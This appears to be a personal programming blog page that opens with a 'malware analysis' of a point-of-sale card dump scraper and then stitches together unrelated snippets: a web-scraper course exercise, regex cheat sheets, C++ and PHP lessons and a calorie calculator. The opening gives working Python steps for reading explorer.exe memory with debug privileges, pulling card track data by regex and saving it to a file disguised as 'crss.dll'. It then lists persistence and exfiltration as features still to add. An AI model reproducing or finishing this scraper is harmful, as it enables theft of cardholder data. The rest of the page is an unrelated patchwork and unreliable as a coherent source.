Malware Analysis: Dump Scraper Implementation in Python Using winappdbg, getpass, re, sys
Method of Operation of Scanning explorer.exe for Dump Data:

(1) Show the Windows version and the current architecture (from winappdbg: System.os, System.arch, System.bits).
(2) Create a snapshot of running processes (from winappdbg.System: request_debug_privileges(), scan_processes()).
(3) Obtain the local username (from getpass.getuser()).
(4) Create a writeable file in Application Data:
```python
Dump_Writer = open('C:\\Documents and Settings\\' + UserName + '\\Application Data\\crss.dll', 'w+')
```
(5) Obtain all processes that match the requested filename:
```python
# Elevate privileges
system.request_debug_privileges()
system.scan_processes()
for process, filename in system.find_processes_by_filename("explorer.exe"):
    pid = process.get_pid()
    bits = process.get_bits()
    print pid, bits
```
(6) Get a memory map of the process:
```python
memoryMap = process.get_memory_map()
mappedFilenames = process.get_mapped_filenames(memoryMap)
```
(7) For each memory block in the map, read the address and size of the block, its state (free or allocated), its page protection bits (looking for win32.MEM_COMMIT), and its memory type.
(8) Read the data from memory:
```python
if mbi.has_content() and mbi.State == win32.MEM_COMMIT:
    Data = process.read(BaseAddress, RegionSize)
```
(9) Implement a simple regular expression looking for Track2 data:
```python
Dump_Regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', Data)
Dump_Data.append(Dump_Regex)
```
(10) Beautify the extracted dump data.
(11) Write the dump data into crss.dll.

Missing features are as follows:
(1) Add Registry Persistence
(2) Encode Saved Data
(3) Add Luhn Algorithm
(4) Create a process for this algorithm
(5) Send data to email/C2
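As an added example from the analyst's side (not the post's code): the post's `%B...^...^...?` pattern, which is actually the Track 1 format-B layout, applied to a constructed byte buffer standing in for one committed memory region, with the Luhn check the post lists as a missing feature and the PAN masked in the report so that a forensic scan of a memory dump does not itself leak card data. It also covers the Track 2 `;PAN=...?` layout, which the page does not mention; the test PANs, offsets and region contents are all constructed here.

```python
import re

# The post's %B<PAN>^<name>^<expiry+service code+discretionary>? pattern (Track 1, format code B),
# with the PAN narrowed to 13-19 digits; the ;<PAN>=...? Track 2 layout is added here, not on the page.
TRACK1_RE = re.compile(rb'%B(\d{13,19})\^([\w\s/]{2,26})\^(\d{7}\w*)\?')
TRACK2_RE = re.compile(rb';(\d{13,19})=(\d{4})(\d{3})(\d*)\?')


def luhn_ok(pan):
    """Luhn mod-10 check: every second digit from the right is doubled (9 subtracted if > 9)."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan):
    """Keep the BIN (first 6) and last 4 digits; a triage report should never carry the full PAN."""
    return pan[:6] + '*' * (len(pan) - 10) + pan[-4:]


def scan_region(data, base_address=0):
    """Return Luhn-valid track hits in one memory region as dicts (address, track, masked PAN)."""
    hits = []
    for track, rx in ((1, TRACK1_RE), (2, TRACK2_RE)):
        for m in rx.finditer(data):
            pan = m.group(1).decode('ascii')
            if not luhn_ok(pan):  # the layout alone is noisy; Luhn removes most false positives
                continue
            hits.append({'address': base_address + m.start(), 'track': track,
                         'pan': mask_pan(pan), 'pan_len': len(pan)})
    return sorted(hits, key=lambda h: h['address'])


# Constructed region: two public test PANs in Track 1 / Track 2 layout, plus one that fails Luhn
SAMPLE_REGION = (b'\x00' * 16
                 + b'%B4111111111111111^DOE/JOHN^2512101000000000?' + b'\x00' * 8
                 + b';5555555555554444=25121010000000000?' + b'\x00' * 8
                 + b'%B4111111111111112^FAKE/CARD^2512101000000000?' + b'\x00' * 16)

if __name__ == '__main__':
    # Constructed base address, as a MEMORY_BASIC_INFORMATION.BaseAddress would supply it
    for h in scan_region(SAMPLE_REGION, base_address=0x00400000):
        print('0x%08x track%d %s (%d digits)' % (h['address'], h['track'], h['pan'], h['pan_len']))
```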
```python
#!/usr/bin/env python
# _author = vkremez
# This is an assignment for the University of Michigan course "Using Python to Access Web Data."
# This Python program will allow us to scrape the content of a website for any URLs.
# Here is the algorithm:
'''
The program will use urllib to
(1) read the HTML from the website data,
(2) extract the href= values from the anchor tags,
(3) scan for a tag that is in a particular position relative to the first name in the list,
(4) follow that link and repeat the process a number of times and report the results.
'''
import argparse
import urllib
from datetime import datetime
from bs4 import BeautifulSoup

parser = argparse.ArgumentParser(description='Web Scraper 1.0 by VK.')
parser.add_argument('--url', help='starting URL in http://website.com format')
parser.add_argument('--count', type=int, help='number of links to follow')
parser.add_argument('--position', type=int, help='1-based position of the link to follow on each page')
args = parser.parse_args()

print 'WEB SCRAPER 1.0'
print datetime.now()

# Anything not given on the command line is asked for interactively
url = args.url or raw_input('Enter URL: ')
count = args.count or int(raw_input('Enter count: '))
position = args.position or int(raw_input('Enter position: '))

print "Retrieving: " + url
for x in range(count):
    html = urllib.urlopen(url).read()
    soup = BeautifulSoup(html)
    tags = soup('a')
    # Follow the link at the requested position and repeat from there
    url = tags[position - 1].get('href', None)
    print "Retrieving: " + url
```

SOURCE: http://code.tutsplus.com/tutorials/8-regular-expressions-you-should-know--net-6149

1. Matching a Username
   Pattern: /^[a-z0-9_-]{3,16}$/
   A. String that matches: my-us3r_n4m3
   B. String that doesn't match: th1s1s-wayt00_l0ngt0beausername (too long)
2. Matching a Password
   Pattern: /^[a-z0-9_-]{6,18}$/
   A. String that matches: myp4ssw0rd
   B. String that doesn't match: mypa$$w0rd (contains a dollar sign)
3. Matching a Hex Value
   Pattern: /^#?([a-f0-9]{6}|[a-f0-9]{3})$/
   A. String that matches: #a3c113
   B. String that doesn't match: #4d82h4 (contains the letter h)
4. Matching a Slug
   Pattern: /^[a-z0-9-]+$/
   A. String that matches: my-title-here
   B. String that doesn't match: my_title_here (contains underscores)
5. Matching an Email
   Pattern: /^([a-z0-9_\.-]+)@([\da-z\.-]+)\.([a-z\.]{2,6})$/
   A. String that matches: john@doe.com
   B. String that doesn't match: john@doe.something (TLD is too long)
6. Matching a URL
   Pattern: /^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$/
   A. String that matches: http://net.tutsplus.com/about
   B. String that doesn't match: http://google.com/some/file!.html (contains an exclamation point)
7. Matching an IP Address
   Pattern: /^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/
8. Matching an HTML Tag
   Pattern: /^<([a-z]+)([^<]+)*(?:>(.*)<\/\1>|\s+\/>)$/
   A. String that matches: <a href="http://net.tutsplus.com/">Nettuts+</a>
   B. String that doesn't match: <img src="img.jpg" alt="My image>" /> (attributes can't contain greater-than signs)

// Reminder
```cpp
#include <iostream>
using namespace std;

int main() {
    int a[5][5], b[5][5], c[5][5], m, n, p, q, i, j, k;
    cout << "Enter rows and columns of your first matrix: ";
    cin >> m >> n;
    cout << "Enter rows and columns of your second matrix: ";
    cin >> p >> q;
    // The arrays are fixed at 5x5, so larger dimensions would write past their bounds
    if (m < 1 || n < 1 || p < 1 || q < 1 || m > 5 || n > 5 || p > 5 || q > 5) {
        cout << "\nDimensions must be between 1 and 5";
        return 1;
    }
    // Multiplication is only defined when the first matrix has as many columns as the second has rows
    if (n == p) {
        cout << "\nEnter your first matrix:\n";
        for (i = 0; i < m; ++i)
            for (j = 0; j < n; ++j)
                cin >> a[i][j];
        cout << "\nEnter your second matrix:\n";
        for (i = 0; i < p; ++i)
            for (j = 0; j < q; ++j)
                cin >> b[i][j];
        cout << "\nThe new matrix is: \n";
        for (i = 0; i < m; ++i) {
            for (j = 0; j < q; ++j) {
                c[i][j] = 0;
                for (k = 0; k < n; ++k)
                    c[i][j] = c[i][j] + (a[i][k] * b[k][j]);
                cout << c[i][j] << "\t";
            }
            cout << "\n";
        }
    } else
        cout << "\nMatrix multiplication can't be done";
    return 0;
}
```

# Regular Expressions
Identifiers:
\d   Any digit
\D   Anything but a digit
\s   Whitespace
\S   Anything but whitespace
\w   Any word character (letter, digit or underscore)
\W   Anything but a word character
.    Any character except for a new line
\b   Word boundary (the edge of a word)
\.   A literal period

Modifiers:
{1,3}  We are expecting 1-3
+      Match 1 or more
?      Match 0 or 1
*      Match 0 or more
$      Match the end of a string
^      Match the beginning of a string
|      Either or, e.g. \d{1,3}|\w{5,6}
[]     Range or "variance": [A-Z] or [A-Za-z] or [1-5a-qA-Z]
{x}    Expecting "x" amount

White Space Characters:
\n   New line
\t   Tab
\s   Space
\f   Form feed
\e   Escape
\r   Carriage return

DON'T FORGET! These are metacharacters and must be escaped to match them literally: . + * ? [ ] $ ^ ( ) { } | \

PHP is an object-oriented programming language, which means that you can create objects, which can contain variables and functions.
```php
<!DOCTYPE html>
<html>
<head>
    <title>Introduction to Object-Oriented Programming</title>
    <link type='text/css' rel='stylesheet' href='style.css'/>
</head>
<body>
<p>
<?php
// The code below creates the class
class Person {
    // Creating some properties (variables tied to an object)
    public $isAlive = true;
    public $firstname;
    public $lastname;
    public $age;

    // Assigning the values
    public function __construct($firstname, $lastname, $age) {
        $this->firstname = $firstname;
        $this->lastname = $lastname;
        $this->age = $age;
    }

    // Creating a method (function tied to an object)
    public function greet() {
        return "Hello, my name is " . $this->firstname . " " . $this->lastname . ". Nice to meet you! :-)";
    }
}

// Creating a new person called "excellent 12345", who is 12345 years old ;-)
$me = new Person('excellent', '12345', 12345);
// Printing out what the greet method returns
echo $me->greet();
?>
</p>
</body>
</html>
```

```cpp
#include <iostream>
#include <cmath>
using namespace std;

int main(void) {
    float value, square_root;
    cout << "Enter your number now: " << endl;
    cin >> value;
    // sqrtf is only defined for non-negative input
    if (value >= 0.0) {
        square_root = sqrtf(value);
        cout << "You have entered: " << value << endl;
        cout << "Your square root is: " << square_root << endl;
    }
    return 0;
}
```

```python
#!/usr/bin/env python
# Fitness Calculator
# Coded By Vitali
from datetime import datetime

now = datetime.now()
print "%s/%s/%s %s:%s:%s" % (now.month, now.day, now.year, now.hour, now.minute, now.second)
print "Welcome to Fitness Calculator!"
name = raw_input("Please Enter Your First and Last Name: ")
# int(raw_input()) rather than input(): in Python 2, input() evaluates whatever is typed
exercise = int(raw_input("How many calories have you burned today? "))
meal = int(raw_input("How many calories have you consumed today? "))
goal = int(raw_input("How many calories would you like to cut per day? "))
total = exercise - meal
print "Good day %s, so your difference is %s calories, your goal is %s calories, and your meal is %s calories." % (name, total, goal, meal)
print "Thank you for using this Fitness Calculator!"
print "Please leave us your feedback!"

def feedback():
    print "This is the feedback zone!"
    answer = int(raw_input("How do you rate it from 1 to 10? "))
    if answer < 6:
        print "Thank you! We will do our best to improve this application in future!"
    else:
        print "Thank you! We are glad that you have enjoyed using this application!"

feedback()
```

Becoming a programmer is deeply connected with the years-long study of cybersecurity, penetration testing, digital forensics, and information security.
It forces me to draw from all the disciplines I have learned. It is my test of perseverance, creativity, and knowledge, which also, rather unexpectedly, turned out to be the catalyst in my decision to study programming.
Author: Vitali Kremez
Archives: January 2016